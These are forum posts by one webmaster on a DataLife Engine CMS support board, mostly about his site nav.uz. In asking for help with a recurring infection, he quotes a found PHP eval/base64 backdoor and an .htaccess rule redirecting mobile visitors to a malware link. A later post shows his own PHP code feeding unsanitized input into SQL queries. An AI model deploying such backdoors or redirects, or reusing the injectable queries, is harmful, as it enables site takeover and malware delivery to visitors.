ngmk
-
Публикации
47 -
Зарегистрирован
-
Посещение
Сообщения, опубликованные пользователем ngmk
-
-
После того как убрали постороннее, и поставили все патчи, теперь ждите появится код или нет. Если не появится значит все верно сделали, если появится, значит не все нашли и удалили.
Вчера 3-го февраля опять появился код. По соседству с моим сайтом расположены по несколько сайты на DLE, wordpress и joomla которые тоже также заражены. Были заменены пароли к хостингу, БД, ftp и админдоступам сайта. Не помогло ((
-
Патчи поставлены, права выставил 0400. Но через несколько дней права меняются на 777 и левый код опять появляется Как быть помогите.
Ищите шелл на сервере, это может быть любой PHP файл не имеющий отношения к стандартным файлам DLE. Либо украдены доступы к серверу. Проверяйте файлы в папке engine/data/ на наличие посторонних и подозрительных кодов.
Нашел в dbconfig.php - сторонний код, удалил.
Нашел в папке jscripts неизвестный антивирусу файл 404.php - удалил. Что еще порекомендуете?
Также нашел в корневом htaccess - левый код, залил по новой.
engine/classes/min/index.php и тут тоже
config.php - тоже нашел.
Сам левый код:
--------------------------------------------------------------------------------
if(!empty($_POST['g1'])) {
eval(base64_decode($_POST['g1']));
die;
}
if(!empty($_POST['g2'])) eval(base64_decode($_POST['g2']));
if(!empty($_GET['g2'])) eval(base64_decode($_GET['g2']));
?&--#62;
----------------------------------------------------------------------------------------
в engine.php - тоже.
в init.php тоже
в файл engine/classes/min/index.php поставил патч:
if (isset($_GET['f'])) { $_GET['f'] = str_replace(chr(0), '', (string)$_GET['f']); }
-
Здравствуйте. Сайт http://nav.uz. DLE9.6. В корневом файле htaccess вставляют код, который при мобильном просмотре перенаправляет на левый ресурс и просит поставить программу с вирусом:
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
#########rataman##########
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opera mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (pre/|palm os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows ce|opera mobi|windows ce; smartphone;|windows ce; iemobile) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (mini 9.5|vx1000|lge |m800|e860|u940|ux840|compal|wireless| mobi|ahong|lg380|lgku|lgu900|lg210|lg47|lg920|lg840|lg370|sam-r|mg50|s55|g83|t66|vx400|mk99|d615|d763|el370|sl900|mp500|samu3|samu4|vx10|xda_|samu5|samu6|samu7|samu9|a615|b832|m881|s920|n210|s700|c-810|_h797|mob-x|sk16d|848b|mowser|s580|r800|471x|v120|rim8|c500foma:|160x|x160|480x|x640|t503|w839|i250|sprint|w398samr810|m5252|c7100|mt126|x225|s5330|s820|htil-g1|fly v71|s302|-x113|novarra|k610i|-three|8325rc|8352rc|sanyo|vx54|c888|nx250|n120|mtk |c5588|s710|t880|c5005|i;458x|p404i|s210|c5100|teleca|s940|c500|s590|foma|samsu|vx8|vx9|a1000|_mms|myx|a700|gu1100|bc831|e300|ems100|me701|me702m-three|sd588|s800|8325rc|ac831|mw200|brew |d88|htc/|htc_touch|355x|m50|km100|d736|p-9521|telco|sl74|ktouch|m4u/|me702|8325rc|kddi|phone|lg |sonyericsson|samsung|240x|x320|vx10|nokia|sony cmd|motorola|up.browser|up.link|mmp|symbian|smartphone|midp|wap|vodafone|o2|pocket|mobile|treo) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(1207|3gso|4thp|501i|502i|503i|504i|505i|506i|6310|6590|770s|802s|a wa|acer|acs-|airn|alav|asus|attw|au-m|aur |aus |abac|acoo|aiko|alco|alca|amoi|anex|anny|anyw|aptu|arch|argo|bell|bird|bw-n|bw-u|beck|benq|bilb|blac|c55/|cdm-|chtm|capi|cond|craw|dall|dbte|dc-s|dica|ds-d|ds12|dait|devi|dmob|doco|dopo|el49|erk0|esl8|ez40|ez60|ez70|ezos|ezze|elai|emul|eric|ezwa|fake|fly-|fly_|g-mo|g1 u|g560|gf-5|grun|gene|go.w|good|grad|hcit|hd-m|hd-p|hd-t|hei-|hp i|hpip|hs-c|htc |htc-|htca|htcg|htcp|htcs|htct|htc_|haie|hita|huaw|hutc|i-20|i-go|i-ma|i230|iac|iac-|iac/|ig01|im1k|inno|iris|jata|java|kddi|kgt|kgt/|kpt |kwc-|klon|lexi|lg g|lg-a|lg-b|lg-c|lg-d|lg-f|lg-g|lg-k|lg-l|lg-m|lg-o|lg-p|lg-s|lg-t|lg-u|lg-w|lg/k|lg/l|lg/u|lg50|lg54|lge-|lge/|lynx|leno|m1-w|m3ga|m50/|maui|mc01|mc21|mcca|medi|meri|mio8|mioa|mo01|mo02|mode|modo|mot |mot-|mt50|mtp1|mtv |mate|maxo|merc|mits|mobi|motv|mozz|n100|n101|n102|n202|n203|n300|n302|n500|n502|n505|n700|n701|n710|nec-|nem-|newg|neon|netf|noki|nzph|o2 x|o2-x|opwv|owg1|opti|oran|p800|pand|pg-1|pg-2|pg-3|pg-6|pg-8|pg-c|pg13|phil|pn-2|pt-g|palm|pana|pire|pock|pose|psio|qa-a|qc-2|qc-3|qc-5|qc-7|qc07|qc12|qc21|qc32|qc60|qci-|qwap|qtek|r380|r600|raks|rim9|rove|s55/|sage|sams|sc01|sch-|scp-|sdk/|se47|sec-|sec0|sec1|semc|sgh-|shar|sie-|sk-0|sl45|slid|smb3|smt5|sp01|sph-|spv |spv-|sy01|samm|sany|sava|scoo|send|siem|smar|smit|soft|sony|t-mo|t218|t250|t600|t610|t618|tcl-|tdg-|telm|tim-|ts70|tsm-|tsm3|tsm5|tx-9|tagt|talk|teli|topl|hiba|up.b|upg1|utst|v400|v750|veri|vk-v|vk40|vk50|vk52|vk53|vm40|vx98|virg|vite|voda|vulc|w3c |w3c-|wapj|wapp|wapu|wapm|wig |wapi|wapr|wapv|wapy|wapa|waps|wapt|winc|winw|wonu|x700|xda2|xdag|yas-|your|zte-|zeto|acs-|alav|alca|amoi|aste|audi|avan|benq|bird|blac|blaz|brew|brvw|bumb|ccwa|cell|cldc|cmd-|dang|doco|eml2|eric|fetc|hipt|http|ibro|idea|ikom|inno|ipaq|jbro|jemu|java|jigs|kddi|keji|kyoc|kyok|leno|lg-c|lg-d|lg-g|lge-|libw|m-cr|maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|mywa|nec-|newt|nok6|noki|o2im|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|rozo|sage|sama|sams|sany|sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo|teli|tim-|tosh|treo|tsm-|upg1|upsi|vk-v|voda|vx52|vx53|vx60|vx61|vx70|vx80|vx81|vx83|vx85|wap-|wapa|wapi|wapp|wapr|webc|whit|winw|wmlb|xda-) [NC,OR]
RewriteCond %{HTTP:Accept} (text/vnd.wap.wml|application/vnd.wap.xhtml+xml) [NC,OR]
RewriteCond %{HTTP:Profile} .+ [NC,OR]
RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR]
RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]
RewriteCond %{QUERY_STRING} !noredirect [NC]
RewriteCond %{HTTP_USER_AGENT} !^(Mozilla/5.0 (Linux; U; Android 2.2; en-us; Nexus One Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 offline)$ [NC]
RewriteCond %{HTTP_USER_AGENT} !(windows.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|america|avant|download|fdm|maui|webmoney|windows-media-player) [NC]
RewriteRule ^(.*)$ http://clck.ru/8sNeJ [L,R=302]
#########!rataman!#########
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Патчи поставлены, права выставил 0400. Но через несколько дней права меняются на 777 и левый код опять появляется Как быть помогите.
-
Сайт http://nav.uz - ни смотря на то что в настройках стоит "Не индексировать версию для печати"- индексируются роботом версия именно для печати.
Содержимое файла Роботс:
User-agent: *
Disallow: /engine/go.php
Disallow: /engine/download.php
Disallow: /user/
Disallow: /newposts/
Disallow: /statistics.html
Disallow: /*subaction=userinfo
Disallow: /*subaction=newposts
Disallow: /*do=lastcomments
Disallow: /*do=feedback
Disallow: /*do=register
Disallow: /*do=lostpassword
Disallow: /*do=addnews
Disallow: /*do=stats
Disallow: /*do=pm
Disallow: /forum/newtopic-17
Disallow: /board/add
Disallow: /board/rabota/add
Disallow: /index.php?do=addafisha
Disallow: /index.php?do=addcatalog
Disallow: /index.php?do=addvideo
Disallow: /music/addfile.html
Disallow: /tel.html
Disallow: /photo-add
Disallow: /blog/addnews/
Помимо всего сайт пропал с индекса гугла вообще, индексируется лиш форум и юзеры, пришлось изменить роботс:
User-agent: *
Disallow: /engine/go.php
Disallow: /engine/download.php
Disallow: /user/
Disallow: /newposts/
Disallow: /statistics.html
Disallow: /*subaction=userinfo
Disallow: /*subaction=newposts
Disallow: /*do=lastcomments
Disallow: /*do=feedback
Disallow: /*do=register
Disallow: /*do=lostpassword
Disallow: /*do=addnews
Disallow: /*do=addafisha
Disallow: /*do=addcatalog
Disallow: /*do=stats
Disallow: /*do=pm
Disallow: /*print
Disallow: /board/add
Disallow: /board/rabota/add
Disallow: /video/upload/
Disallow: /music/addfile.html
Disallow: /tel.html
Disallow: /photo-add
Что неправильно?
-
Здравствуйте!
У меня вопрос по гороскопу 1.7
Как вывести гороскоп на главной странице сайта, а не только по ссылке http://atashe.uz/index.php?do=horoscope ?
Пробовал вывести файлы "horoscope.tpl" и "horoscope.php" через стандартные теги DLE {include file=}, не помогло.
сайт на DLE 9.5
модуль скачан с сайта dle-news.ru в разделе "сторонние модули".
Заранее благодарю.
-
Какая у Вас версия DLE?
dle 9.6. Увидел что в 9.7 появилась возможность подключения файлов из других папок шаблона, но обновлятся не хочу, модов много.
-
даДостаточно хорошо смотрится!
Скажи, у тебя там установлен форум - Bullet Energy?
тупым действиям тут не место!тупо нажал на войти...надпись Ошибка авторизации появилась где то в попе.
-
не вижу ответа...
-
Прошу заценить сайт-портал города Навои http://nav.uz на дле 9.6
-
1
-
-
Сайт http://nav.uz. Модуль:Доска обьявлений. Пытаюсь вывести категории в правую колонку для чего использую: {include file="board/default/category/list.tpl"}, однако на сайте выходит: "Отсутствует файл шаблона: board-folder-category-list.tpl" Помогите советом. Спасибо заранее за ответ.
-
Сайт http://nav.uz. Модуль:Доска обьявлений. Пытаюсь вывести категории в правую колонку для чего использую: {include file="board/default/category/list.tpl"}, однако на сайте выходит: "Отсутствует файл шаблона: board-folder-category-list.tpl" Помогите советом. Спасибо заранее за ответ.
-
Я собираюсь написать модуль с сходим функционалом.
И как?
-
Настоящий городской портал на базе DLE c возможностью заработка http://nav.uz
-
На сайте у меня нет вопросов, мне боты не мешают, а на форуме по военной тематике использую вопросы соответственно военной тематики, Вам лучше знать какие вопросы на своем сайте сформировать, т.к. наверняка разбираетесь для чего и кого сайт делался. На Вашем месте я бы убрал вопрос "О каком городе наш сайт? Ответьте кириллицей.", потому что ответить на него не составит труда
действительно спам регистраторы на втором этапе атаки, вручную пробивают непробитые сайты.
Приведите пару примеров пожалуйста.
-
Попробуйте вопрос-ответ сделать по тематике сайта и все боты отвалятся.
Хотелось бы посмотреть на ваш сайт и вопросы....
-
А свои вопросы уникальные придумываем, но впоследствии получаем тупые сообщения через обратную связь что не смогли ответить на вопросы.
Чтоб не получать подобные сообщения, может надо вопросы правильно сформулировать?
Вопросы типа: О каком городе наш сайт? Ответьте кириллицей.
На этот вопрос ответить не проблема (т.к. вопрос из ряда стандартных), собственно Вы сами дали ответ как отвечают на них - "действительно спам регистраторы на втором этапе атаки, вручную пробивают непробитые сайты"
Так на примере моего сайта, помогите придумать пару вопросов, а то чтото, на самом деле не догоняю. Спасибо.
-
Сайт http://nav.uz Зря так говорите, как писали наверху, действительно спам регистраторы на втором этапе атаки, вручную пробивают непробитые сайты. А свои вопросы уникальные придумываем, но впоследствии получаем тупые сообщения через обратную связь что не смогли ответить на вопросы.Вопросы типа: О каком городе наш сайт? Ответьте кириллицей.
Дайте направление куда копать в поиске Нужных вопросов! Спасибо за ответ.
-
Попробуйте вопрос-ответ сделать по тематике сайта и все боты отвалятся. Ваша арифметика в виде сложений-вычитаний мало от них спасает. И не ставьте вопросы типа "Назовите столицу России",
О каких вопросах идет речь? Подскажите плз, а то тоже достали уже...
-
-
да, но на сайте PHP скрипт выполняется только при включенном АПАЧЕ, как только подключается NGINX скрипт PHP просто напросто перестает работать в шаблонах сайта?
-
Добрый день!
При выводе php файла на сайте http://nav.uz/tel.php страница открывается обычной странице, обходя шаблон сайта. Пробовал, создав статистическую страницу на сайте, заключенные в теге <form>…</form> вышеуказанного php файла, но после нажатия кнопки «Поиск» результаты запроса (через engine/modules/tel.php файл) также выводятся в обычной странице. Как вывести указанный файл php в статистической странице интегрировав в шаблон сайта как «посты» и выводить весь функционал главной страницы. Ниже представлен тело исполняемого php файла:
ngmk,
1,Правильный вариант описан в документации http://dle-news.ru/e...es_include.html но потребуется переписывание вашего PHP файла
2,Самый быстрый вариант http://dle-news.ru/t...shablonakh.html но это не рекомендуется.
в .htaccess всё работает по 2-варианту, но сайт висит в nginx, а там данное правила не дейтсвует, что надо делать чтобы это работало в nginx? где копать? заранее спасибо.
ссылка на страницу: http://nav.uz/telephone.html
-
ngmk,
Правильный вариант описан в документации http://dle-news.ru/e...es_include.html но потребуется переписывание вашего PHP файла
Самый быстрый вариант http://dle-news.ru/t...shablonakh.html но это не рекомендуется.
Спасибо!
-
Добрый день!
При выводе php файла на сайте http://nav.uz/tel.php страница открывается обычной странице, обходя шаблон сайта. Пробовал, создав статистическую страницу на сайте, заключенные в теге <form>…</form> вышеуказанного php файла, но после нажатия кнопки «Поиск» результаты запроса (через engine/modules/tel.php файл) также выводятся в обычной странице. Как вывести указанный файл php в статистической странице интегрировав в шаблон сайта как «посты» и выводить весь функционал главной страницы. Ниже представлен тело исполняемого php файла:
<table width=100%> <tr> <td><form action="tel.php" method="post" name="Form_namber" target="_parent"> <p><tr><td>Введите номер телефона: </td> <td><input name="n" type="text" size="7" maxlength="7" /></td></tr></p> <p><tr><td>Введите фамилию абонента:<br />(используйте вместо буквы "ё" букву "е")</td> <td><input name="ln" type="text" size="40" maxlength="30" /></td></tr></p> <p><tr><td>Введите название улицы и дом: </td> <td> <select name="id_street"> <?php $db = mysql_connect("localhost","",""); mysql_select_db("",$db); $result4 = mysql_query("SELECT * FROM Street",$db); $myrow4 = mysql_fetch_array($result4); do { echo "<option value=".$myrow4['id'].">".$myrow4['street']."</option>"; } while($myrow4 = mysql_fetch_array($result4)); ?> </select> <input name="h" type="text" size="4" maxlength="4" /> <input name="submit" type="submit" value="Поиск" /> </td></tr></p> </td> </tr> </form> </table> <?php $db = mysql_connect("localhost","",""); mysql_select_db("",$db); $n = $_POST['n']; $ln = $_POST['ln']." %"; $h = $_POST['h']; $id_street = $_POST['id_street']; echo '<table width="740" border="1" id="1">'; echo '<caption>'; echo 'РЕЗУЛЬТАТ ЗАПРОСА'; echo '</caption>'; echo '<tr>'; echo '<th width="100" scope="col">Номер абонента</th>'; echo '<th width="180" scope="col">Фамилия абонента</th>'; echo '<th width="300" scope="col">Улица</th>'; echo '<th width="45" scope="col">Дом</th>'; echo '<th width="45" scope="col">Кор.</th>'; echo '<th width="45" scope="col">Кв.</th>'; echo '</tr>'; echo '<tr>'; if($n != 0) { $result = mysql_query("SELECT * FROM Sprav WHERE Telefon_namber = $n ORDER BY Telefon_namber ASC",$db); $myrow = mysql_fetch_array($result); echo "<td>".$myrow['Telefon_namber']."</td>"; echo "<td>".$myrow['Abonent']."</td>"; echo "<td>".$myrow['Tip']." ".$myrow['Strit']."</td>"; echo "<td>".$myrow['House']."</td>"; echo "<td>".$myrow['Korpus']."</td>"; echo "<td>".$myrow['Kvartira']."</td>"; echo "</tr>"; } $result1 = mysql_query("SELECT * FROM Sprav WHERE Abonent LIKE '$ln' ORDER BY Telefon_namber ASC",$db); $myrow1 = mysql_fetch_array($result1); //if($myrow1 = mysql_fetch_array($result1) != "") //{ do { echo "<tr>"; echo "<td>".$myrow1['Telefon_namber']."</td>"; echo "<td>".$myrow1['Abonent']."</td>"; echo "<td>".$myrow1['Tip']." ".$myrow1['Strit']."</td>"; echo "<td>".$myrow1['House']."</td>"; echo "<td>".$myrow1['Korpus']."</td>"; echo "<td>".$myrow1['Kvartira']."</td>"; echo "</tr>"; } while($myrow1 = mysql_fetch_array($result1)); //} if($id_street != 0) { $result2 = mysql_query("SELECT * FROM Street WHERE id = $id_street",$db); $myrow2 = mysql_fetch_array($result2); $qr_street = $myrow2['street']; $result3 = mysql_query("SELECT * FROM Sprav WHERE (Strit = '$qr_street' AND House = '$h') ORDER BY Kvartira ASC",$db); $myrow3 = mysql_fetch_array($result3); do { echo "<tr>"; echo "<td>".$myrow3['Telefon_namber']."</td>"; echo "<td>".$myrow3['Abonent']."</td>"; echo "<td>".$myrow3['Tip']." ".$myrow3['Strit']."</td>"; echo "<td>".$myrow3['House']."</td>"; echo "<td>".$myrow3['Korpus']."</td>"; echo "<td>".$myrow3['Kvartira']."</td>"; echo "</tr>"; } while($myrow3 = mysql_fetch_array($result3)); } echo "</table>"; ?> -
Сайт http://nav.uz.Лицензия имеется, dle 9.6. Необходимо создать несколько форм добавления новостей подобие http://nav.uz/addnews.html:
1. http://nav.uz/add_afisha.html - в категорию Афиша
2. http://nav.uz/add_catalog.html - в Бизнес каталог
3. http://nav.uz/add_video.html - в категорию Видео
Путем обычного копирования не получился( Если имеются инструкции то скиньте ссылку или подскажите куда копать... Заранее благодарен
Ограничение прав Добавления новостей для отдельных групп пользователей
в DataLife Engine (Общие вопросы)
Опубликовано:
Здравствуйте. Сайт nav.uz. Есть предложение.
При создании новой категории назначать полномочия - Кто (из групп пользователей) может добавлят новости в эту категорию.
В моем случае это нужно чтобы Пользователь при добавлении новостей не видел те категории куда ему не стоит (даже ошибочно) добавлять новости. Спасибо.